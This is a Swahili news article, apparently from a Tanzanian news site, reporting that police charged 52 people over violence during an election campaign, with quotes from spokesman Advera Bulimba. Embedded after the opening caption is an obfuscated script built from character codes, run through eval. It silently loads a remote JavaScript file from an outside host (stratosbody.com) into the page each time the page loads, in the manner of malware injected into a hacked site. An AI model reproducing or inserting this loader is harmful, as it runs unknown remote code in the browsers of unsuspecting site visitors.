<p>Msemaji wa Jeshi nchini, Advera Bulimba</p><script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>
JESHI la Polisi nchini limewafikisha mahakamani watuhumiwa 52 kwa kujihusisha na makosa mbalimbali wakati wa kampeni, ikiwemo kuvamia mikutano ya vyama vingine vya siasa na kuanzisha vurugu.
Kukamatwa kwa watu hao ni kutokana na kuripotiwa kwa matukio 107 ya uvunjifu wa amani, ambapo tayari matukio 38 yameshafanyiwa upelelezi na kufunguliwa kesi huku matukio mengine 68 yakiendelea kufanyiwa upelelezi.
Akitoa tathimini ya mwenendo wa kampeni za uchaguzi, Msemaji wa Jeshi hilo, Advera Bulimba alisema kwa ujumla hali ya amani ni shwari, licha ya kuwepo kwa matukio madogo madogo ya uvunjifu wa amani.
âHali ya amani kwa sasa nchini ni shwari hasa katika kipindi hiki cha kampeni licha ya kuwepo kwa matukio madogo madogo yanayoripotiwa ya uvunjifu wa amani. âHakuna matukio makubwa ya uvunifu wa amani yaliyotufikia na hili linatokana na wagombea kufuata taratibu na sheria mbalimbali ikiwemo za Tume ya Taifa ya Uchaguzi iliyoziweka ambazo kila mgombea na wananchi wanatakiwa kuzifuata,â alisema Bulimba.
Bulimba alisema makosa yaliyopelekea kukamatwa kwa watuhumiwa hao ni pamoja na wafuasi wa vyama vya siasa kuvamia au kuwazomea wafuasi wa chama kingine, kuondoa au kubandua mabango ya mgombea wa chama kingine, kuchoma moto au kuchana bendera za chama kingine cha siasa.
Makosa mengine ni pamoja na baadhi ya watu kufanya mafunzo yenye mwelekeo wa kijeshi, kutoa maneno ya uchochezi na lugha za matusi na wengine kuzuia watu kusoma matangazo yaliyobandikwa ya wagombea.
Kufuatia hali hiyo, polisi imetoa onyo kali kwa wananchi wote na vyama vya siasa pamoja na wafuasi wao kuzingatia sheria zinazowaongoza ikiwemo sheria ya vyama vya siasa na miongozo mbalimbali iliyotolewa na mwenyekiti wa tume hiyo.
Bulimba alisema zikiwa zimebaki siku chache kufanyika kwa uchaguzi, ni vyema wagombea wakajiepusha na lugha za uchochezi ikiwemo kusema watapiga kura na kuzilinda kitu ambacho kinaweza kusababisha vurugu.
Tangu kuanza kwa kampeni za uchaguzi mkuu Agosti 22 mwaka huu, kumeripotiwa kutokea kwa uvunjifu wa amani katika baadhi ya maeneo hapa nchini yaliyosababisha mtu mmoja kupoteza maisha huko mkoani Mara.
Simamia is a news house where visitors will get up to date information on news, events, and so on.
Join us to get updated, entertained and learn. Our website is www.Simamia.com or email us at SimamiaTeam@gmail.com
Recent Comments